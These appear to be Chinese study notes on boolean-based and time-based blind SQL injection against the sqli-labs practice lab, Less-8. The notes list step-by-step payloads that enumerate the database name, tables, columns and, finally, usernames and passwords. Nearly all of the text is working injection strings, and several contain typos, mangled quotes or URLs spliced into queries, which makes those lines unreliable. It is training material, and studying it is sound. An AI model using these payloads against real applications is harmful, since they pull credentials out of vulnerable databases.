布尔型注入:
②利用length语句判断数据库长度
http://127.0.0.1/sqli/Less-8/?id=1' and length(database()) >7 -- +
http://127.0.0.1/sqli/Less-8/?id=1’ and length(database()) >8 -- +,异常
所以长度为8
http://127.0.0.1/sqli/Less-8/?id=1’ and length(database()) =8 -- +,正常能进
③求当前数据库库名的第一个字符(求数据库名的ASCII值)
?id=1’ and ascii(substr(database(),1,1))>114 ,正常能进
http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr(database(),1,1))>115 -- +,不能进
所以http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr(database(),1,1))=115 -- +,ascii为115
④求当前数据库所有表的数量
http://127.0.0.1/sqli/Less-8/Id=1’and(selectcount(table_name)from http://127.0.0.1/sqli/Less-8/ information_schema.tables where table_schema=’security’) =4 ,进去,说明表数量为4
⑤求表名长度
http://127.0.0.1/sqli/Less-8/and if((select length(table_name) from information_schema.tables where table_shcema='secuity' limit 0,1)=6,sleep(5),1) -- +
limit 0,1从第一行显示,往后显示一行
⑥求表名对应的ASCII值
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101%23
⑦求列的数量
id=1’ and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)=3%23
⑧.求列名的长度
http://127.0.0.1/sqli/Less-8/and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3 -- +
⑨求列名对应的ASCII值
id=1’ and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’limit 0,1),1,1))=105%23
⑩求字段的数量
id=1’ and (select count(username) from security.users)=13%23
⑪求字段内容的长度
http://127.0.0.1/sqli/Less-8/and (select length(username) from security.users limit 0,1)=4 -- +
⑫.求字段对应的ASCII值
http://127.0.0.1/sqli/Less-8/and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 -- +
时间型盲注:
①求数据库库名长度
id=1’and if(length(database())=8,sleep(3),1) -- +
②求数据库库名对应的ascii值
id=1’ and if(ascii(substr((select database()),1,1))=115,sleep(3),1) -- +
③求表的数量
id=1’and if((select count(*)from information_schema.tables where table_schema=’security’)=4,sleep(3),1) -- +
④求表名的长度
id=1’ and if((select length(table_name)from information_schema.tables where table_schema=’security’limit 0,1)=6,sleep(3),1) -- +
⑤求表名对应的ascii码
id=1’ and if(ascii(substr((select (table_name)from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101,sleep(3),1) -- +
⑥求列的数量
id=1’ and if((select count(column_name)from information_schema.columns where table_schema=’security’ and table_name=’users’)=3,sleep(3),1) -- +
⑦求列名的ascii码
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(3),1) -- +
⑧求字段数量
id=1' and if((select count(username)from security.users)=13,sleep(3),1) -- +
⑨求字段内容
id=1’ and if(ascii(substr((select concat(username,0x23,password)from security.users limit 0,1),1,1))=68,sleep(3),1) -- +